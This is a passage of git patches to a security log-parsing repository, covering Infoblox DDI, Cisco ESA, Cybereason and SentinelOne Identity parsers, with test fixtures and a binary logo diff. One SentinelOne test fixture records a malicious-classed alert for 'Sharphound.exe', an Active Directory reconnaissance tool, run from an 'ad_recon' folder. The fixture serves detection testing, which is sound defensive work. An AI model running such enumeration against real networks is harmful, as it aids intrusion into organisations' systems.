\"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"header\",\n \"modifier\": \"funfy-auth-token\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user\",\n \"invert\": true,\n \"operator\": \"equals\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user/authenticate\",\n \"invert\": true,\n \"operator\": \"equals\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\",\n \"type\": \"http\",\n \"documentation\": \"RefreshToken is required\",\n \"method\": \"all\",\n \"endpoint\": \"user/*\",\n \"responses\": [\n {\n \"uuid\": \"e5d4e8a4-037e-4e72-b8a3-1e4b9c5da3bd\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$.refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\",\n \"type\": \"http\",\n \"documentation\": \"\",\n \"method\": \"get\",\n \"endpoint\": \"test\",\n \"responses\": [\n {\n \"uuid\": \"acc619a1-6ec7-45a6-888c-a7a860ed237b\",\n \"body\": \"{\\n \\\"message\\\": \\\"route required auth\\\"\\n}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n }\n ],\n \"rootChildren\": [\n {\n \"type\": \"route\",\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\"\n },\n {\n \"type\": \"folder\",\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\"\n }\n ],\n \"proxyMode\": false,\n \"proxyHost\": \"\",\n \"proxyRemovePrefix\": false,\n \"tlsOptions\": {\n \"enabled\": false,\n \"type\": \"CERT\",\n \"pfxPath\": \"\",\n \"certPath\": \"\",\n \"keyPath\": \"\",\n \"caPath\": \"\",\n \"passphrase\": \"\"\n },\n \"cors\": true,\n \"headers\": [\n {\n \"key\": \"Content-Type\",\n \"value\": \"application/json\"\n },\n {\n \"key\": \"Access-Control-Allow-Origin\",\n \"value\": \"*\"\n },\n {\n \"key\": \"Access-Control-Allow-Methods\",\n \"value\": \"GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS\"\n },\n {\n \"key\": \"Access-Control-Allow-Headers\",\n \"value\": \"Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With\"\n }\n ],\n \"proxyReqHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"proxyResHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"data\": [\n {\n \"uuid\": \"38fb975d-c6f0-48d9-ae52-9e3fbc5cb654\",\n \"id\": \"8wey\",\n \"name\": \"Globals\",\n \"documentation\": \"\",\n \"value\": \"\"\n },\n {\n \"uuid\": \"2372a308-c890-479c-a18b-54abe4696967\",\n \"id\": \"zzay\",\n \"name\": \"ISODate\",\n \"documentation\": \"Datetime shared format comes from backend\",\n \"value\": \"\\\"{{now 'yyyy-MM-dd\\\\'T\\\\'HH:mm:ss\\\\'Z\\\\''}}\\\"\"\n },\n {\n \"uuid\": \"160c80f4-39c7-494d-a489-06da2e51aa87\",\n \"id\": \"g4qq\",\n \"name\": \"CreateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"email\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"c1d673ba-f7cf-4fd2-8cc8-449017a3ff17\",\n \"id\": \"ofz6\",\n \"name\": \"AuthenticateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"2844853c-c892-4671-9201-0b252711a36b\",\n \"id\": \"w34k\",\n \"name\": \"User\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"id\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"email\\\": \\\"{{faker 'internet.email'}}\\\",\\n \\\"phone\\\": \\\"{{faker 'phone.number' style='international'}}\\\",\\n \\\"createdAt\\\": \\\"{{data 'ISODate'}}\\\",\\n \\\"updatedAt\\\": \\\"{{data 'ISODate'}}\\\",\\n}\"\n },\n {\n \"uuid\": \"e698b979-5934-45f2-8612-5782a8b1e0be\",\n \"id\": \"77fk\",\n \"name\": \"Authentication\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"refreshToken\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"accessToken\\\": \\\"{{faker 'string.uuid'}}\\\"\\n}\"\n }\n ],\n \"callbacks\": []\n}", + "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", "event": { "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", "kind": "alert", + "provider": "Identity", + "reason": "This events is raised when a LDAP search Query is detected from the endpoint.", + "start": "2024-11-22T08:45:50Z", "type": "info" }, + "@timestamp": "2024-11-22T08:45:50Z", "observer": { "product": "Singularity Identity", "vendor": "SentinelOne" }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, "sentinelone": { "identity": { - "name": "Mocked api" + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-dc47-75de-8925-5f026bd5a705", + "name": "LDAP Search Detected", + "status": "NEW" } } } From 6a8f65023adad6d1ffe2c55447233833f3ff4db5 Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Mon, 2 Dec 2024 18:32:45 +0200 Subject: [PATCH 117/150] Fix comments --- Infoblox/ddi/_meta/fields.yml | 10 ---------- Infoblox/ddi/ingest/parser.yml | 10 ++++++---- Infoblox/ddi/tests/query_log_dhcp_1.json | 7 +++---- Infoblox/ddi/tests/query_log_dhcp_2.json | 7 +++---- Infoblox/ddi/tests/query_log_dhcp_4.json | 4 ++-- Infoblox/ddi/tests/query_log_dhcp_5.json | 4 ++-- Infoblox/ddi/tests/query_log_dhcp_6.json | 4 ++-- Infoblox/ddi/tests/query_log_dns_1.json | 10 +++++----- 8 files changed, 23 insertions(+), 33 deletions(-) diff --git a/Infoblox/ddi/_meta/fields.yml b/Infoblox/ddi/_meta/fields.yml index 69f6818da..947dad6cf 100644 --- a/Infoblox/ddi/_meta/fields.yml +++ b/Infoblox/ddi/_meta/fields.yml @@ -13,21 +13,11 @@ infoblox.dhcp.interface_ip: name: infoblox.dhcp.interface_ip type: ip -infoblox.dhcp.lease_message: - description: The lease message. - name: infoblox.dhcp.lease_message - type: keyword - infoblox.dhcp.lease_time: description: The lease time. name: infoblox.dhcp.lease_time type: keyword -infoblox.dhcp.request_message: - description: The request message. - name: infoblox.dhcp.request_message - type: keyword - infoblox.dhcp.router_ip: description: The IP address of the router. name: infoblox.dhcp.router_ip diff --git a/Infoblox/ddi/ingest/parser.yml b/Infoblox/ddi/ingest/parser.yml index e54b3ef79..2597e3675 100644 --- a/Infoblox/ddi/ingest/parser.yml +++ b/Infoblox/ddi/ingest/parser.yml @@ -43,7 +43,7 @@ pipeline: ## For DNS message like: ## FORMERR resolving 'test.testing.io/AAAA/IN': 192.168.1.136#53 - DNS_FORMERR: "%{WORD:event_action} resolving '%{DATA:dns_question_name}/%{DATA:dns_question_type}/%{DATA:dns_question_class}': %{IP:client_ip}#%{NUMBER:client_port}" + DNS_FORMERR: "%{WORD:event_action} resolving '%{DATA:dns_question_name}/%{DATA:dns_question_type}/%{DATA:dns_question_class}': %{IP:destination_ip}#%{NUMBER:destination_port}" ## For other message like: ## r-l-e:192.168.1.113,Fixed,P76984,c4:d0:e3:b4:08:4d,1732119022,1732291822,,$ @@ -74,7 +74,7 @@ pipeline: ## For DHCP message like: ## Option 82: received a REQUEST DHCP packet from relay-agent eth2 with a circuit-id of "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0", a remote-id of "0a:44:70:46" for 192.168.1.222 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW) - DHCP_OTHER: 'Option %{NUMBER}: received a %{DATA:event_action} packet from %{NOTSPACE} %{DATA:infoblox_nios_log_dhcp_relay_interface_name} with a circuit-id of \"%{DATA:infoblox_nios_log_dhcp_circuit_id}\", a remote-id of \"%{DATA:infoblox_nios_log_dhcp_remote_id}\" for %{IP:client_ip} \(%{MAC:client_mac}\) lease time is %{DATA:infoblox_nios_log_dhcp_lease_time} seconds. \(%{DATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_OTHER: 'Option %{NUMBER}: received a %{DATA:event_action} packet from %{NOTSPACE} %{DATA:infoblox_nios_log_dhcp_relay_interface_name} with a circuit-id of \"%{DATA:infoblox_nios_log_dhcp_circuit_id}\", a remote-id of \"%{DATA:infoblox_nios_log_dhcp_remote_id}\" for %{IP:client_ip} \(%{MAC:client_mac}\) %{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}' - name: parse_event filter: "{{'DHCPACK' in original.message}}" @@ -119,17 +119,19 @@ stages: - set: "@timestamp": "{{parse_datetime.result}}" event.action: "{{parse_event.message.event_action}}" + event.reason: "{{parse_event.message.infoblox_nios_log_dhcp_request_message or parse_event.message.infoblox_nios_log_dhcp_lease_message}}" source.port: "{{parse_event.message.client_port}}" source.mac: "{{parse_event.message.client_mac}}" + destination.ip: "{{parse_event.message.destination_ip}}" + destination.port: "{{parse_event.message.destination_port}}" + observer.ingress.interface.name: "{{parse_event.message.observer_ingress_interface_name}}" infoblox.dhcp.interface_ip: "{{parse_event.message.infoblox_nios_log_dhcp_interface_ip}}" infoblox.dhcp.trans_id: "{{parse_event.message.infoblox_nios_log_dhcp_trans_id}}" infoblox.dhcp.router_ip: "{{parse_event.message.infoblox_nios_log_dhcp_router_ip}}" - infoblox.dhcp.request_message: "{{parse_event.message.infoblox_nios_log_dhcp_request_message}}" - infoblox.dhcp.lease_message: "{{parse_event.message.infoblox_nios_log_dhcp_lease_message}}" infoblox.dhcp.lease_time: "{{parse_event.message.infoblox_nios_log_dhcp_lease_time}}" infoblox.dhcp.circuit_id: "{{parse_event.message.infoblox_nios_log_dhcp_circuit_id}}" diff --git a/Infoblox/ddi/tests/query_log_dhcp_1.json b/Infoblox/ddi/tests/query_log_dhcp_1.json index 43383a2e1..0e2ff27e2 100644 --- a/Infoblox/ddi/tests/query_log_dhcp_1.json +++ b/Infoblox/ddi/tests/query_log_dhcp_1.json @@ -5,7 +5,8 @@ "expected": { "message": "Option 82: received a REQUEST DHCP packet from relay-agent eth2 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.222 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)", "event": { - "action": "REQUEST DHCP" + "action": "REQUEST DHCP", + "reason": "lease time is undefined seconds. (NEW)" }, "dns": { "header_flags": [], @@ -13,9 +14,7 @@ }, "infoblox": { "dhcp": { - "circuit_id": "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0", - "lease_message": "NEW", - "lease_time": "undefined" + "circuit_id": "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0" } }, "related": { diff --git a/Infoblox/ddi/tests/query_log_dhcp_2.json b/Infoblox/ddi/tests/query_log_dhcp_2.json index 9474b00d8..44aebdb62 100644 --- a/Infoblox/ddi/tests/query_log_dhcp_2.json +++ b/Infoblox/ddi/tests/query_log_dhcp_2.json @@ -5,7 +5,8 @@ "expected": { "message": "Option 82: received a REQUEST DHCP packet from relay-agent 192.168.1.53 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.53 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)", "event": { - "action": "REQUEST DHCP" + "action": "REQUEST DHCP", + "reason": "lease time is undefined seconds. (NEW)" }, "dns": { "header_flags": [], @@ -13,9 +14,7 @@ }, "infoblox": { "dhcp": { - "circuit_id": "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0", - "lease_message": "NEW", - "lease_time": "undefined" + "circuit_id": "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0" } }, "related": { diff --git a/Infoblox/ddi/tests/query_log_dhcp_4.json b/Infoblox/ddi/tests/query_log_dhcp_4.json index 417007f30..826be7f66 100644 --- a/Infoblox/ddi/tests/query_log_dhcp_4.json +++ b/Infoblox/ddi/tests/query_log_dhcp_4.json @@ -5,7 +5,8 @@ "expected": { "message": "DHCPREQUEST for 192.168.1.208 from 00:50:56:ae:17:c6 (VDPSCE080019) via eth2 TransID 823c1fa3 uid 01:00:50:56:ae:17:c6 (RENEW)", "event": { - "action": "DHCPREQUEST" + "action": "DHCPREQUEST", + "reason": "RENEW" }, "dns": { "header_flags": [], @@ -13,7 +14,6 @@ }, "infoblox": { "dhcp": { - "lease_message": "RENEW", "trans_id": "823c1fa3" } }, diff --git a/Infoblox/ddi/tests/query_log_dhcp_5.json b/Infoblox/ddi/tests/query_log_dhcp_5.json index 14a6991a4..681472682 100644 --- a/Infoblox/ddi/tests/query_log_dhcp_5.json +++ b/Infoblox/ddi/tests/query_log_dhcp_5.json @@ -5,7 +5,8 @@ "expected": { "message": "DHCPREQUEST for 192.168.1.95 (192.168.1.95) from d8:94:03:ec:da:d1 via 192.168.1.95 TransID ac1b72c4: lease 192.168.1.95 unavailable.", "event": { - "action": "DHCPREQUEST" + "action": "DHCPREQUEST", + "reason": "lease 192.168.1.95 unavailable." }, "dns": { "header_flags": [], @@ -14,7 +15,6 @@ "infoblox": { "dhcp": { "interface_ip": "192.168.1.95", - "request_message": "lease 192.168.1.95 unavailable.", "router_ip": "192.168.1.95", "trans_id": "ac1b72c4" } diff --git a/Infoblox/ddi/tests/query_log_dhcp_6.json b/Infoblox/ddi/tests/query_log_dhcp_6.json index f0ca93fce..ad6128a51 100644 --- a/Infoblox/ddi/tests/query_log_dhcp_6.json +++ b/Infoblox/ddi/tests/query_log_dhcp_6.json @@ -5,7 +5,8 @@ "expected": { "message": "DHCPREQUEST for 192.168.1.159 from c8:09:a8:f8:cd:e8 via 192.168.1.159 TransID e711c0c1: ignored (unknown subnet).", "event": { - "action": "DHCPREQUEST" + "action": "DHCPREQUEST", + "reason": "ignored (unknown subnet)." }, "dns": { "header_flags": [], @@ -14,7 +15,6 @@ "infoblox": { "dhcp": { "interface_ip": "192.168.1.159", - "request_message": "ignored (unknown subnet).", "trans_id": "e711c0c1" } }, diff --git a/Infoblox/ddi/tests/query_log_dns_1.json b/Infoblox/ddi/tests/query_log_dns_1.json index 2c4c9a783..042f12e70 100644 --- a/Infoblox/ddi/tests/query_log_dns_1.json +++ b/Infoblox/ddi/tests/query_log_dns_1.json @@ -7,6 +7,11 @@ "event": { "action": "FORMERR" }, + "destination": { + "address": "192.168.1.136", + "ip": "192.168.1.136", + "port": 53 + }, "dns": { "header_flags": [], "question": { @@ -26,11 +31,6 @@ "ip": [ "192.168.1.136" ] - }, - "source": { - "address": "192.168.1.136", - "ip": "192.168.1.136", - "port": 53 } } } \ No newline at end of file From 5dd9ece3f663615741b67ba65d8a99d536197e57 Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Mon, 2 Dec 2024 18:35:01 +0200 Subject: [PATCH 118/150] Apply linter --- Infoblox/ddi/ingest/parser.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Infoblox/ddi/ingest/parser.yml b/Infoblox/ddi/ingest/parser.yml index 2597e3675..0fd9855e8 100644 --- a/Infoblox/ddi/ingest/parser.yml +++ b/Infoblox/ddi/ingest/parser.yml @@ -145,13 +145,13 @@ stages: {% if parse_event.message.flags_rd == "+" %}"RD",{% endif %} {% if parse_event.message.flags_cd == "C" %}"CD",{% endif %} ] - + - set: dns.type: query filter: '{{parse_event.message.get("response_code") == None}}' - set: dns.type: answer - dns.response_code: '{{parse_event.message.response_code}}' + dns.response_code: "{{parse_event.message.response_code}}" filter: '{{parse_event.message.get("response_code") != None}}' - set: @@ -161,7 +161,7 @@ stages: {"name": "{{record[0]}}", "ttl": {{record[1]}}, "class": "{{record[2]}}", "type": "{{record[3]}}", "data": "{{record[4][:-1]}}"}, {%- endfor -%} ] - filter: '{{parse_event.message.get(''dns_records'') != None}}' + filter: "{{parse_event.message.get('dns_records') != None}}" - set: network.transport: tcp @@ -170,7 +170,7 @@ stages: network.transport: udp filter: '{{parse_event.message.get("flags_tcp") != None and parse_event.message.flags_tcp != "T"}}' - set: - network.transport: '{{parse_event.message.network_transport | lower }}' + network.transport: "{{parse_event.message.network_transport | lower }}" filter: '{{parse_event.message.get("network_transport") != None}}' - set: From 243d7ed895f12d4dc48ed17c9c1047d8ccc3f6e0 Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Mon, 2 Dec 2024 18:37:18 +0200 Subject: [PATCH 119/150] Fix smart-descriptions.json --- Infoblox/ddi/_meta/smart-descriptions.json | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/Infoblox/ddi/_meta/smart-descriptions.json b/Infoblox/ddi/_meta/smart-descriptions.json index 2b9898cb2..86ef44018 100644 --- a/Infoblox/ddi/_meta/smart-descriptions.json +++ b/Infoblox/ddi/_meta/smart-descriptions.json @@ -29,11 +29,19 @@ ] }, { - "value": "Query on {source.ip}", + "value": "Query from {source.ip}", "conditions": [ { "field": "source.ip" } ] + }, + { + "value": "Query to {destination.ip}", + "conditions": [ + { + "field": "destination.ip" + } + ] } ] From 4021572be3c0a923081619948426a55389e019e5 Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Mon, 2 Dec 2024 19:00:32 +0200 Subject: [PATCH 120/150] Fix cisco-esa --- Cisco/cisco-esa/ingest/parser.yml | 3 ++- Cisco/cisco-esa/tests/test_attachments_details.json | 6 +++++- Cisco/cisco-esa/tests/test_ingest_log2.json | 6 +++++- Cisco/cisco-esa/tests/test_ingest_log5.json | 7 ++++++- Cisco/cisco-esa/tests/test_ingest_log7.json | 3 ++- 5 files changed, 20 insertions(+), 5 deletions(-) diff --git a/Cisco/cisco-esa/ingest/parser.yml b/Cisco/cisco-esa/ingest/parser.yml index b20c3d0d7..9dc1d4b5e 100644 --- a/Cisco/cisco-esa/ingest/parser.yml +++ b/Cisco/cisco-esa/ingest/parser.yml @@ -70,6 +70,7 @@ pipeline: external: name: dict.parse properties: + output_field: message input_field: > {{ parsed_event.message.ESAURLDetails }} @@ -213,7 +214,7 @@ stages: {% endif %} {%- endfor %}] cisco.esa.url: >- - [{% for url, details in dict(json_event_url_details.message).items() %} + [{% for url, details in json_event_url_details.message.items() %} "{% if details.get('ExpandedUrl') is not none %}{{ details.ExpandedUrl }}{% else %}{{ url }}{% endif %}" {% if not loop.last %},{% endif %} {% endfor %}] diff --git a/Cisco/cisco-esa/tests/test_attachments_details.json b/Cisco/cisco-esa/tests/test_attachments_details.json index 448ea5b15..56ac98c83 100644 --- a/Cisco/cisco-esa/tests/test_attachments_details.json +++ b/Cisco/cisco-esa/tests/test_attachments_details.json @@ -54,7 +54,11 @@ "domain": { "age": "30 days (or greater)" } - } + }, + "url": [ + "http://schemas.microsoft.com/office/2004/12/omml", + "http://www.w3.org/TR/REC-html40" + ] } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log2.json b/Cisco/cisco-esa/tests/test_ingest_log2.json index d8d9bc5a6..afb99f16d 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log2.json +++ b/Cisco/cisco-esa/tests/test_ingest_log2.json @@ -57,7 +57,11 @@ "domain": { "age": "9 years 3 months 14 days" } - } + }, + "url": [ + "http://mandrill.appc.cisco.com/track/open.php?u=30372747&id=d57275a6c9df40418a90fd977e3bf506", + "https://bce-demo.appc.cisco.com/sensors/a7b04388-0f6e-11e9-8def-0242ac110002" + ] } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log5.json b/Cisco/cisco-esa/tests/test_ingest_log5.json index a85f9845d..553425b45 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log5.json +++ b/Cisco/cisco-esa/tests/test_ingest_log5.json @@ -51,7 +51,12 @@ "domain": { "age": "30 days (or greater)" } - } + }, + "url": [ + "https://facebook.com/u/john.doe", + "https://tiktok.com", + "www.twitter.com" + ] } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log7.json b/Cisco/cisco-esa/tests/test_ingest_log7.json index b77951dcf..29716af19 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log7.json +++ b/Cisco/cisco-esa/tests/test_ingest_log7.json @@ -54,7 +54,8 @@ "domain": { "age": "30 days (or greater)" } - } + }, + "url": [] } }, "email": { From 9daca2729d6227513899135a5e32b0eb8337b757 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 2 Dec 2024 18:41:51 +0100 Subject: [PATCH 121/150] fix(CybeReason): fix the identifier of the connector associated to the intake --- CybeReason/malop-json/_meta/manifest.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CybeReason/malop-json/_meta/manifest.yml b/CybeReason/malop-json/_meta/manifest.yml index f1b4f8074..e4cdd5419 100644 --- a/CybeReason/malop-json/_meta/manifest.yml +++ b/CybeReason/malop-json/_meta/manifest.yml @@ -1,7 +1,7 @@ uuid: 9f89b634-0531-437b-b060-a9d9f2d270db name: Cybereason EDR slug: cybereason-malop-json -automation_connector_uuid: ff092b32-68dc-11ee-8c99-0242ac120002 +automation_connector_uuid: 8128d255-22df-4f4c-96af-ca6c1123f4cf automation_module_uuid: b96361fb-a01b-4ae7-8927-9622b9ea0acf description: >- From 82eeda946e6c3e4819b3cf7808c6d5f0623bc8fc Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Tue, 3 Dec 2024 17:30:15 +0100 Subject: [PATCH 122/150] fix(SentinelOne): fix the logo for identity --- SentinelOne/identity/_meta/logo.png | Bin 27937 -> 1853 bytes 1 file changed, 0 insertions(+), 0 deletions(-) diff --git a/SentinelOne/identity/_meta/logo.png b/SentinelOne/identity/_meta/logo.png index bad66643418120e4e1dbdc385258d64188b37661..817c84f53c5bbb9277dd6ba33f3ccb0ab2078e36 100644 GIT binary patch literal 1853 zcmcJQ|6kHc8o)vMl7e`(t6qwxU3Ha(r=~6z23nin0>#|&3#IL9qF^hK2x)>@)NU!6 z$)+oT>z5Uc*y1!bInK5fEtGXNF~z#XL_+CA?e;p|{c!)o{xHuo&&>0hndd#v%yTt? zc*Moo(-{N;xx_>tA_H1!ZyR8M#A#tcAP^i9bBJ)P=-UMY=}L0epZov)GCg}x(zvfB zCl?m)(i)iiZp&5v;pn}&iOpHnA1iY_l+@YKa>*scuB&RzHmUoKx`t=(NHNv?gdNvH z2-(hlH+C^o(_f-b%?)?G7c+-B;`bj6NaTZ}Pm14sY30x1aCOyLTN&i<%-}0uA$7*x z_?vB@qjHCRUCw`qL1C;Rnq1CCr+r#?5PrE$tYPEOMJI`Ch(<;HI)c1Qw-#0yClV zJQ!%j*G@Y6XCE6s$zZ!n(%ScE3e@=l___8p;SA4^$`eavzWw0+r+DIqZhVE~>M}T7 zCI_Z)9G>bMH^5o-$Vf=LgoazP2g+6*u$XiD0sg8p7L%+W;1QvW^jwAEBGHYJzFT1^ zgDn|3f(6t*p>5W!!%K(H4>+sPUW73MIefbNKH<}Wa2iv>pQ>-~3x#%CDLMkP+RL(aAGs)=#O9cdQi58%fEes(aHicurGZb{tb66K_2QUYhP~ zJbSQeNL(fFP3)daq^=+a+tuRzqmLFp3xd9gyh%XS2$;j(txmZ zf8ov=1Gc7A#?wn&uSW-1sq!%qjPtK2Y!bUvo_y?VuylgaoZ8y_9UR>5AfyA zc0ju}>(23kkWVvRf!k4KJSX?chK@ap_;kB64}7Izp`DO%3ZownbCSFhfNc*jBu-Gq0uJy{xmns28V zq4Ogt?$xze+St6QTsdBFK#d8v3ZpOt!Jfw$8F2RWi>Rgz`$II+ZFm8hSHIhsK$b-L zWVWEN)!R%$xE`;1)Cf5D0Z$Ojjdag&BVk`!8Yt0}p&0VMooecKUEI>`} zW*E&E_zot&N9ysI9e8%aMg>2e#=}SoGaS3V1yM3MfSv+TA_FY}9Wni`F*Xsn%M#CD zXDYiYl*PUGy=T=ERC0?+D}jg^S+Pr(uf?E%iI46Te=12 zR+#}i32vgwCTAjihtU$|u@IW?oU3l{C|!@w$Kg8@Clvgt3%o^1L#AVw4Mf4$_rVwi z;BIwl$rRl9+L7g?g?MRZp{7j;g($*L>rGQd+g=e{uf2CA2jkgN>BjlRBaPOG4%?=p rHgIkF*!Nse!&b*XsyzI^@|X`UDnrM|o3!VFvIvSfOgtoy%qaUEoY88+ literal 27937 zcmeFXWl)>Z_bwWsNb%ss358Oe0!50JAO#AfkO0A*;!@m;1-C+Jp-`X{2<}$gU5a~g zhZ0;*`a3dn=YQ|FJ9FmDoOcF3ZgGG;YE^RN7<7HRNA3U{2%Z-h+?=KpR?NlHClmpQ5 zH+?bvZQ42`!z_bG+OU>N`)r*pD>z0#80RJzJB^xOlGMADcc$4xcy9iN>iwp~5!1Le zTk&qm?%~nR)%Kymdm-1S#R_r5Uc;^c(Eok@uLb^(wE!Gr#|;Z%ZSNg1dtsS#eh>0y z-fEpg>WOtdeBrExhp3bY0y;7IW6ir}Klt7qIo$0Bh5z~~SJt2UwQ(l~b8g$zvvhz*4SXpDgnZGl!$_7bTNX)7_7O!fWG8t#1f zZA*cRbk0?YR}W^^W8ATTJI za}5CoGjs!@5Z>LGGAwmA?uasAaF?Gh#t$25Y9Pew-#kH3o)2VUn&1gs)N-9KD9F^}4+mV-5E%2#dCg=H0H$oKYI3^RnQB zE{-|Fx zFn}iv@BB7dvQwI9Jko&!_Kgc)0on(z?yO7aHRJ5p_SEM_RoePMz=DSN^Yok&C+FUao{9HW!jv{&o1$Oy6_ z!O;O1c19@#pt7^}&!1sn1bXQt6*l|3WFi!BxKK#=;|4G_U+xXu>_lTo zqW)v(KK)cov|#|F6!nqYJi_`4_V6UtI@zZ@$tx~|^;u{)Rd5t(VE^218+_Pw?2Z{% z7LPyxe;P>G6CR&7@U_UUp?TV#HG9J>P+q7tqv@(U{E4$+38XZ6-KV4oFt=qO5;<3S zW3yqNe69hd!{j~~qx}>(kWETa_!??5(fa74+gI_eHX&d> zw1k;7@-d80nzU_;aBVesh_`6-@rA0KV%n}R-R+p}3rW($9oc;r6+ku&SlrndZhyDc zOW=-4tR-tQKdKtp@k_2>wT{0mQqY;rftGp{wj^&2MqtKbuLiX}F4rvGGwDEBe?ilP 